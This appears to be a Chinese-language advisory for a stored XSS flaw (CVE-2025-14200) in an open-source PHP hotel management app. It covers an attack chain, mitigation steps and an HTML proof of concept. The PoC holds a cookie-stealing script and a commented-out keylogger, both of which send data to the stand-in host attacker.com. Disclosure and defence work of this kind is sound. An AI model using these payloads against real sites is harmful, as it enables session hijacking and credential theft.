CVE-2025-14200 Hotel-Management XSS跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-14200

漏洞类型

XSS跨站脚本攻击

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

alokjaiswal Hotel-Management-services-using-MYSQL-and-php

漏洞概述

CVE-2025-14200是一个存在于alokjaiswal开源酒店管理系统中的存储型跨站脚本（XSS）漏洞。该漏洞位于/usersub.php文件的Request Pending Page组件中，由于对用户输入缺乏有效的过滤和转义处理，攻击者可以在页面中注入恶意JavaScript代码。当其他用户访问受污染的页面时，恶意脚本将在其浏览器上下文中执行，可能导致会话劫持、敏感信息窃取或钓鱼攻击等安全问题。由于该产品采用滚动发布模式（rolling release），目前没有明确的版本号标识，漏洞影响范围截止到commit 5f8b60a7aa6c06a5632de569d4e3f6a8cd82f76f。漏洞发现者已向厂商通报但未获得响应，漏洞详情和利用代码已在公开渠道披露，潜在威胁程度较高。

技术细节

该漏洞为存储型XSS（Stored XSS），攻击者通过向/usersub.php的Request Pending Page组件提交包含恶意JavaScript代码的请求，由于服务端未对用户输入进行适当的输入验证和输出编码，恶意内容被直接存储在数据库中。当管理员或其他用户查看待处理请求页面时，之前注入的恶意脚本会被浏览器作为正常HTML/JavaScript解析执行。攻击者可利用此漏洞窃取用户会话cookie、伪造管理员操作、植入钓鱼页面或传播恶意软件。由于该系统采用rolling release持续交付模式，版本标识不明确，增加了漏洞追踪和修复的难度。攻击者需要具备低权限用户账户即可发起攻击，且需要诱导管理员进行交互操作。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标酒店管理系统，发现/usersub.php存在XSS漏洞

STEP 2

步骤2: 构造恶意请求

攻击者构造包含XSS payload（如<script>标签或事件处理器）的请求数据

STEP 3

步骤3: 注入恶意代码

通过POST/GET请求向/usersub.php提交恶意payload，payload被存储到数据库

STEP 4

步骤4: 等待触发

管理员或普通用户访问Request Pending Page时，存储的恶意脚本被渲染执行

STEP 5

步骤5: 窃取敏感信息

恶意脚本执行后可窃取用户cookie、会话令牌或其他敏感信息

STEP 6

步骤6: 权限提升/进一步攻击

利用窃取的凭证进行会话劫持、账户接管或进一步渗透系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-14200 PoC - Stored XSS in /usersub.php -->
<!-- Attack Vector: Submit malicious payload through Request Pending Page -->
<!-- The XSS payload will be stored and executed when admin views the page -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-14200 PoC</title>
</head>
<body>
    <h2>CVE-2025-14200 - Stored XSS PoC</h2>
    <form id="attackForm" action="https://target.com/usersub.php" method="POST">
        <!-- Target endpoint: /usersub.php (Request Pending Page) -->
        <!-- Required fields may vary based on application -->
        <input type="hidden" name="request_type" value="pending">
        
        <!-- XSS Payload - Cookie Stealer -->
        <input type="hidden" name="description" value="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>">
        
        <!-- Alternative XSS Payload - Keylogger -->
        <!-- <input type="hidden" name="description" value="<script>document.onkeypress=function(e){new Image().src='https://attacker.com/log?k='+e.key}</script>"> -->
        
        <!-- Alternative XSS Payload - Basic Alert -->
        <!-- <input type="hidden" name="description" value="<img src=x onerror=alert('XSS-VULNERABLE')>"> -->
        
        <button type="submit">Submit Malicious Request</button>
    </form>
    
    <script>
        // Auto-submit form for demonstration
        // document.getElementById('attackForm').submit();
        console.log('Modify target URL and payload as needed');
    </script>
</body>
</html>

影响范围

alokjaiswal Hotel-Management-services-using-MYSQL-and-php (所有版本至commit 5f8b60a7aa6c06a5632de569d4e3f6a8cd82f76f)

防御指南

临时缓解措施

由于该产品采用rolling release模式无明确版本号，建议：1）立即检查系统是否使用受影响代码，检查/usersub.php文件是否存在于项目中；2）对所有用户输入点实施输入验证和输出编码；3）部署WAF规则阻止XSS特征请求；4）监控异常请求模式；5）关注官方仓库更新，及时应用安全补丁；6）如系统非关键业务，可考虑暂时禁用Request Pending Page功能。